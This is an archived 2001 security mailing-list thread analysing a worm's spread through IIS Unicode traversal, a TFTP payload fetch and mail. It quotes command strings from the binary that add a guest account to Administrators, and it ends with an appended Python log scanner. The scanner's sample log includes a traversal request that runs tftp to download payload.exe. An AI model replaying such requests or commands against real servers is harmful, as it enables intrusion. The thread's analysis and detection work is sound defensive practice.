Security Incidents mailing list archives
RE: Concept Virus(CV) V.5 - Advisory and Quick analysis
From: "Robert Nieuwhof" <RNieuwhof () nos com>
Date: Tue, 18 Sep 2001 14:00:36 -0700
Have you indeed confirmed that the worm utilizes port 69? If so, how was this confirmed and will you please share the criteria and results of your confirmational testing?

Thanks,

Robert J. Nieuwhof, CNA, MCP
mailto:Rnieuwhof () nos com
Network Engineer
NOS Communications - Information Services
http://www.nos.com

Madness takes its toll. Please have exact change.

The information contained in this correspondence is confidential and intended for the use of the individual or entity named above. Unauthorized distribution is prohibited. Any and all opinions expressed are the opinions of the author of this e-mail, and in no way reflect or imply the opinions of NOS Communications.

-----Original Message-----
From: Dave Sill [mailto:davids () socket net]
Sent: Tuesday, September 18, 2001 11:13 AM
To: Grady Fox
Cc: incidents () securityfocus com
Subject: Re: Concept Virus(CV) V.5 - Advisory and Quick analysis

We've blocked 69/udp at our internal and border routers, both incoming and outgoing. Be careful with your private networks. Our tech support department contracted this bug by opening a web page of an infected customer in response to a complaint about performance.

Dave Sill
Server Admin
Socket Internet Services
davids () socket net

On Tuesday 18 September 2001 15:10, you wrote:
> YES
>
> --- Dave Sill <davids () socket net> wrote:
>
> You say that the worm gets a payload by tftp... Is it using port 69?
>
> Thanks,
>
> Dave Sill
> Server Admin
> Socket Internet Services
> davids () socket net
>
> Is the worm
>
> On Tuesday 18 September 2001 10:47, you wrote:
>
> Hi all!
>
> We've all just been hit by a VERY aggressive worm/virus.
>
> Quick analysis indicates that it propagates itself in a number of different ways:
>
> - Through use of IIS UNICODE directory traversal coupled with the recent IIS .dll privilege escalation attack. It uses SMB/CIFS and TFTP to get the worm payload.
> - Through MAPI mails (probably to all of address book).
>
> Other ways of spreading may be possible, but we haven't yet had the time to properly analyse the worm/virus.
>
> It seems to share "c:\" via SMB/CIFS as "c$" and the worm/virus also adds the "Guest" user and "Guests" group to the local "Administrators" group....
>
> Interesting strings in binary:
>
> Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
> SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
> share c$=c:\
> user guest ""
> localgroup Administrators guest /add
> localgroup Guests guest /add
> user guest /active
> open
> user guest /add
> net
>
> More info as we come upon it.....
>
> /olle
---------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
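A log-side check for the two propagation details discussed above, the IIS Unicode directory traversal Olle reports and the TFTP payload fetch Dave asks about, added here as an illustration and not code from anyone in the thread. It canonicalises the request path the way the flawed IIS decoder did (an assumption about that decoder, used only to see what the server would have executed) and flags requests that step above the web root or carry tftp in the query; the IIS W3C log lines are constructed samples, not from the thread.

```python
from urllib.parse import unquote, unquote_to_bytes

# Constructed sample IIS W3C log lines (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
# They are not taken from the thread and exist only to exercise the checks below.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 14:02:11 10.0.0.5 GET /default.htm - 200
2001-09-18 14:02:12 10.0.0.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.7+GET+payload.exe 200
2001-09-18 14:02:13 10.0.0.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:14 10.0.0.9 GET /images/logo.gif - 304
"""

def lenient_utf8(raw: bytes) -> str:
    """Decode as the vulnerable IIS decoder did (assumption): a lead byte 0xC0-0xDF is
    combined with whatever byte follows it, so overlong forms such as %c0%af ('/')
    and unchecked pairs such as %c1%1c ('\\') come out as path separators."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def escapes_webroot(uri_stem: str) -> bool:
    """True if a '..' segment appears after percent-decoding, lenient UTF-8 decoding,
    and a second percent-decode (catches the double-encoded %255c form)."""
    decoded = unquote(lenient_utf8(unquote_to_bytes(uri_stem)))
    return ".." in decoded.replace("\\", "/").split("/")

def scan_iis_log(text: str) -> list:
    """Return (client_ip, [reasons]) for every request worth investigating."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # header line or not the expected seven-field layout
        ip, stem, query = fields[2], fields[4], fields[5]
        reasons = []
        if escapes_webroot(stem):
            reasons.append("directory traversal in cs-uri-stem")
        if "tftp" in unquote(query).lower():
            reasons.append("tftp in cs-uri-query")
        if reasons:
            hits.append((ip, reasons))
    return hits

if __name__ == "__main__":
    for ip, why in scan_iis_log(SAMPLE_LOG):
        print(ip, "; ".join(why))
```

Blocking 69/udp at the border, as Dave did, stops the fetch but not the traversal itself, which is why the path check is kept separate from the tftp check.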